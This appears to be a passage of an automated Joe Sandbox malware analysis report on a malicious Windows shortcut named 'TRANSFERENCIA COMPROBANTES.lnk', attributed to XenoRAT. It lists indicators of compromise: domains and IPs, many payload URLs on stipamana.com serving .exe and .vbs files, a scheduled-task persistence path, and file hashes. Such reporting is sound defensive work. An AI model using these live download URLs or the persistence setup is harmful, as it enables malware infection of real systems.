                        | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe | 100% | Joe Sandbox ML |  |  |
                        | C:\Users\user\AppData\Local\Temp\ .doc | 100% | Joe Sandbox ML |  |  |
                        No Antivirus matches
                        No Antivirus matches
                        | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                        | mira-tmc.tm-4.office.com | 52.123.243.181 | true | false |  | high |
                        | bg.microsoft.map.fastly.net | 199.232.210.172 | true | false |  | high |
                        | dns.stipamana.com | 87.120.121.160 | true | false |  | high |
                        | www.stipamana.com | 94.156.167.57 | true | false |  | high |
                        | Name | Malicious | Antivirus Detection | Reputation |
                        | https://www.stipamana.com/yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe | true | Avira URL Cloud: malware | unknown |
                        | dns.stipamana.com | false |  | high |
                        | https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujghdnjyrtder/buildds.doc | false |  | high |
                        | https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs | true | Avira URL Cloud: malware | unknown |
                                                                                high
                                                                                https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfy??owscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://www.stipamana.com/docdryhsfgwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000000D.00000003.1409195872.000002DD7EA09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgData=C:wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://www.stipamana.com/docdryhsfghdfwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthBwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://www.stipamana.com:443/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrwscript.exe, 0000000A.00000003.1467671580.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1491729771.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473511321.0000029430A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1477018602.0000029430A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1391471213.000001BD2D679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgleswscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xswscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfgwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkuj.wscript.exe, 0000000A.00000002.1489654794.000002942EB67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhiwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdiiowscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsrwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgtwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfTTowscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdfpowershell.exe, 00000001.00000002.1390837542.000001BD2B396000.00000004.00000020.00020000.00000000.sdmp, TRANSFERENCIA COMPROBANTES.lnktrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tdwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.stipamana.wscript.exe, 0000000A.00000002.1489540789.000002942EB5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1485573797.000002942EB5D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.stipamana.com/docd.dlluwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://go.microspowershell.exe, 00000001.00000002.1391471213.000001BD2E3B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdgwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsqwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.stipamana.comHELL32.dll$wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://contoso.com/powershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://www.stipamana.com/docdryhswscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://www.stipamana.com/dPT32.dllwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://www.stipamana.compowershell.exe, 00000001.00000002.1391471213.000001BD2DDAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjuwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufrkujgwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470416027.000002942EBE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470130563.000002942EBE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1485175841.0000029430A0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1470416027.000002942EBC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1422765827.000001BD3D4C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.stipamana.com/doapi.dllwscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghppjwscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/wscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythOFILE=C:wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzspwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsd:wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: malware
                                                                                                      unknown
                                                                                                      https://www.stipamana.com/powershell.exe, 00000001.00000002.1442529638.000001BD45949000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1488105767.000002942EB29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1489540789.000002942EB2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000001.00000002.1391471213.000001BD2E768000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000D.00000003.1409195872.000002DD7E9B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.microsoft.powershell.exe, 00000001.00000002.1441636494.000001BD458D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdythgrsdtgdsr/xsdghdfykgfuktgfjufwscript.exe, 0000000A.00000003.1473436934.000002942EB65000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.stipamana.com/docdryhsfghdfghdfhgd/tsgthsgzsdfdfhgdEwscript.exe, 0000000A.00000002.1489632792.000002942EB62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1475157899.000002942EB61000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  unknown
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
87.120.121.160 | dns.stipamana.com | Bulgaria | 25206 | UNACS-AS-BG8000BurgasBG | false
52.123.243.181 | mira-tmc.tm-4.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
94.156.167.57 | www.stipamana.com | Bulgaria | 48584 | SARNICA-ASBG | false
                                                                                                                  IP
                                                                                                                  127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571198
Start date and time: 2024-12-09 06:51:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                                  Technologies:
                                                                                                                  • HCA enabled
                                                                                                                  • EGA enabled
                                                                                                                  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: TRANSFERENCIA COMPROBANTES.lnk
Detection: MAL
Classification: mal100.troj.expl.evad.winLNK@35/244@2/4
                                                                                                                  EGA Information:
                                                                                                                  • Successful, ratio: 16.7%
                                                                                                                  HCA Information:
                                                                                                                  • Successful, ratio: 100%
                                                                                                                  • Number of executed functions: 306
                                                                                                                  • Number of non-executed functions: 4
                                                                                                                  Cookbook Comments:
                                                                                                                  • Found application associated with file extension: .lnk
                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.28.46, 23.32.238.232, 23.32.238.235, 23.32.238.210, 23.32.238.242, 23.32.238.185, 23.32.238.243, 23.32.238.226, 23.32.238.224, 23.32.238.217, 23.218.208.109, 52.109.68.129, 20.44.10.123, 52.111.252.18, 52.111.252.16, 52.111.252.15, 52.111.252.17, 95.101.110.27, 95.101.110.24, 23.32.238.169, 23.32.238.195, 23.32.238.200, 23.32.238.241
                                                                                                                  • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, time.windows.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, onedscolprdcus05.centralus.cloudapp.azure.com, a1847.dscg2.akamai.net, roaming.officeapps.live.com, login.live.com, e16604.g.akamaiedge.net, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod-all.naturallanguageeditorservice.osi.office.net.akadns.net, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod-inc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.c
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 1168 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 1876 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 3672 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 5528 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 6972 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 7176 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 8076 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 8084 because it is empty
                                                                                                                  • Execution Graph export aborted for target GFKMTE.exe, PID 8112 because it is empty
                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2892 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:52:19 | API Interceptor | 41x Sleep call for process: powershell.exe modified
00:52:31 | API Interceptor | 2x Sleep call for process: svchost.exe modified
02:03:14 | API Interceptor | 594079x Sleep call for process: GFKMTE.exe modified
02:03:14 | API Interceptor | 2x Sleep call for process: wscript.exe modified
08:03:27 | Task Scheduler | Run new task: mrec path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    6271f898ce5be7dd52b0fc260d0662b3TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Software_Tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    https://u48644047.ct.sendgrid.net/ls/click?upn=u001.3irT40U-2BlTtWVjPO1bgMkUPMRV7HMaBj-2FcZe3i1L5jDR7G1Ks0wP9YDqpnyIpxjZeIBaCeYZtGJgliwzSaJhwg-3D-3Dg90K_vPQ7onHR3f0o8KfOdBDFScd6URBvV6dRJTvL1FnCMOJp3bqQS0z8XYrmZvQsYKgv9M18uyN4otj9SHTsh0jVVVuVPoownVxKSao-2Fy-2F5zkA0ggrGoSd-2BVIld1mpIeS3DUcNNIvsq7yFDKM7DHebzUtokLUwZtE0mCsLz1Bm0-2B1LrSQGv4FTM1s6ckzg8R6Atlvbv-2BxwILwC6PQXifnpXLjP04W47PCxVuKYY5jyS-2FXWc-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    3qvTuHPZz2.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    73cceb_de0cf39691b24825b9733575e081f7fa.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    BUNKER INVOICE MV SUN OCEAN.pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Bunker_STS_pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Payment_Advice.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousQuasarBrowse
                                                                                                                                    • 94.156.167.57
                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 52.123.243.181
                                                                                                                                    • 94.156.167.57
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe | TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT
 | Transferencia.lnk | malicious | XenoRAT
 | dHrrqccwkL.doc | malicious | XenoRAT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe | TRANSFERENCIA COMPROBANTES.lnk | malicious | XenoRAT
 | Transferencia.lnk | malicious | XenoRAT
 | dHrrqccwkL.doc | malicious | XenoRAT
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):118
                                                                                                                                                Entropy (8bit):3.5700810731231707
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                                                MD5:573220372DA4ED487441611079B623CD
                                                                                                                                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                                                Malicious:false
Preview:<?xml version="1.0" encoding="UTF-16"?><HeartbeatCache/>
